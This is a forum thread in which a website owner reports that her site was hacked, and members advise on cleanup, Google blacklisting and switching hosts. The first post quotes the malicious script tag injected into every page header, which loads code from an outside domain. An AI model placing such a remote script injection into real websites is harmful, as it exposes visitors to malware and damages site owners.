# My website got hacked!



## Belfrybat (Feb 21, 2003)

I just received a notice from Google Adwords that my website has malware on it, so they are suspending the Adwords campaign. I haven't made any changes to the website for at least 5 months, so had no idea this had happened. 

A script has been inserted into the header that apparently is linked to a sex website -- since this is a Christian website for hermits, that is really bad news. I can't see any problem myself with the website, but I did check it out with a free checking service, and the malware is on it. 
It is showing up on all the sub pages as well. I can see the script when I click on "View" and "Source" in IE, but don't know how to take it down as the way I edit webpages only allows me to see the finished page, not the source behind it. 

Can someone direct me to a free software program that would allow me to edit the source code? Or is this something that the web hosting site should do for me? I would have thought they'd have something in place to prevent this kind of hacking. I pay a premium for this hosting service since I like their shopping basket program. 

Yikes! I can't believe this has happened. If anyone wants to check it out, my URL is http://solitariesofdekoven.org. Click on View and Source and look at line 24 -- 
<script type="text/javascript" src="http://www.deobes.es/clicker.php?id=15716753"> Should not be in there at all.


----------



## mnn2501 (Apr 2, 2008)

Who is your webmaster (the person that set up and maintains it), they should be clearing it out.


----------



## Belfrybat (Feb 21, 2003)

mnn2501 said:


> Who is your webmaster (the person that set up and maintains it), they should be clearing it out.


That would be me, but I don't know how to do it. All I know to do is edit existing files. And that is all I have needed to do for years. 

The web hosting company changed the password and re-installed a backup, so it's clean now. BUT Google is now blocking it and to unblock it I have to upload a Google file, but I don't know how to do it. 

Durn, things have gotten so complicated these days since Front Page was ended. I knew how to work that program. 

I have FTP Commander that I use to upload edited pages, but I can't figure out how to upload a brand new file.

Guess I'm going to have to learn.


----------



## Nevada (Sep 9, 2004)

I know you feel violated, but as server hacks go a defaced web page isn't a server nightmare. A lot of hackers are less obvious but much more destructive. They often plant rootkits that quietly launch spam or DDOS attacks. They sometimes quietly take content like customer identity, or even credit card information. If they're really good at what they do you'll never even know they were there. Compared to those problems a defaced website seems like little more than a prank. But when it's happening to you I know how seriously you'll take it.

Your content can be repaired by connecting with FTP Commander, deleting all content on the server, then uploading your content from backup.

The bigger problem is your domain reputation. I see the following message when I try to reach your domain.

https://dl.dropboxusercontent.com/u/22059150/attack.jpg

That means your domain has been blacklisted by one or more realtime blacklist (RBL), including google. Nobody is going to visit your web site after seeing a warning like that. You'll need to request a review through google webmaster tools. If the script is gone then they should remove you from their blacklist, but beware that google may not be the only RBL who has blacklisted you.

If it makes you feel any better, this probably wasn't your fault at all. I'm familiar enough with your site that I know you don't have any out of date web applications of the kind that could have been hacked. Your pages are considered "flat html" so an out of date web applications isn't a factor. Most likely there's a vulnerability somewhere in your host's webserver that has nothing to do with you. Someone just got sufficient permission to make changes to your content. You might think about a new host, because you can't be sure they solved the problem. You don't want to fix your content only to see it get hacked again in a few weeks. It's important that you take steps to prevent the same thing from happening again.

I'm very sorry to see this happen to you. You don't deserve this.


----------



## Belfrybat (Feb 21, 2003)

Thanks Nevada. The hosting company fixed it right away and changed my password -- I read their e-mail this morning. Apparently my using an easy for me to remember password is what made it easier to hack. And I'm trying to follow Google's instructions to have them verify the fact it's been fixed, but even though I uploaded the file through FTP Commander, it isn't registering as being uploaded. It is on the server list (the right pane), but when I put in the URL in to the web browser, I get "webpage not found". I've contacted vener.net again to see if they would upload the file. If not, I might come knocking on your door again. 

I hate not knowing enough to fix things like this!


----------



## Nevada (Sep 9, 2004)

Belfrybat said:


> Thanks Nevada. The hosting company fixed it right away and changed my password -- I read their e-mail this morning. Apparently my using an easy for me to remember password is what made it easier to hack.


It's possible but I'm skeptical that they guessed your password, even if it was an easy password. Most intrusions are from exploiting some vulnerability in the server. I guess you'll know for sure if it doesn't happen again.


----------



## MichaelZ (May 21, 2013)

Doesn't your hosting company provide some sort of control panel where you can edit the source? If you are going to have a website, you need to be able to edit the code. An inexpensive program is CoffeeCup. I use an old version of Dreamweaver, which I love, but it costs a bit. Look at free editors at http://www.google.com/search?num=50...ss=100...0...1.1.45.serp..1.4.422.xq31dt6zcPk


----------



## Nevada (Sep 9, 2004)

As I suspected, the site is hosted in a compromised environment. The malware was removed and google gave the site a clean bill of health last night, but it's already reinfected & blacklisted again. There's no doubt that some unauthorized person has access to the site content.

I was pretty sure this wasn't a password problem before, but with the reinfection I'm absolutely convinced.


----------



## MichaelZ (May 21, 2013)

Looks like it is time to find another host. Do you have the domain registered with this host too? If so, you should switch registration too - Godaddy is pretty good. I like HostGator as a host - good support and very few problems. If you only have a single site, Godaddy as a host is fine too.

And if you have to switch domain registration, you will need to be firm and persistent. They HAVE to let you have your domain back, but they might try to make you think otherwise. Been there.


----------



## MoonRiver (Sep 2, 2007)

MichaelZ said:


> Looks like it is time to find another host. Do you have the domain registered with this host too? If so, you should switch registration too - Godaddy is pretty good. I like HostGator as a host - good support and very few problems. If you only have a single site, Godaddy as a host is fine too.


But be careful when you change. Hostgator puts you on pages that can cost you money, I did the simplest install it would let me do and then went back and deleted all the potential pay for services that kept popping up.


----------

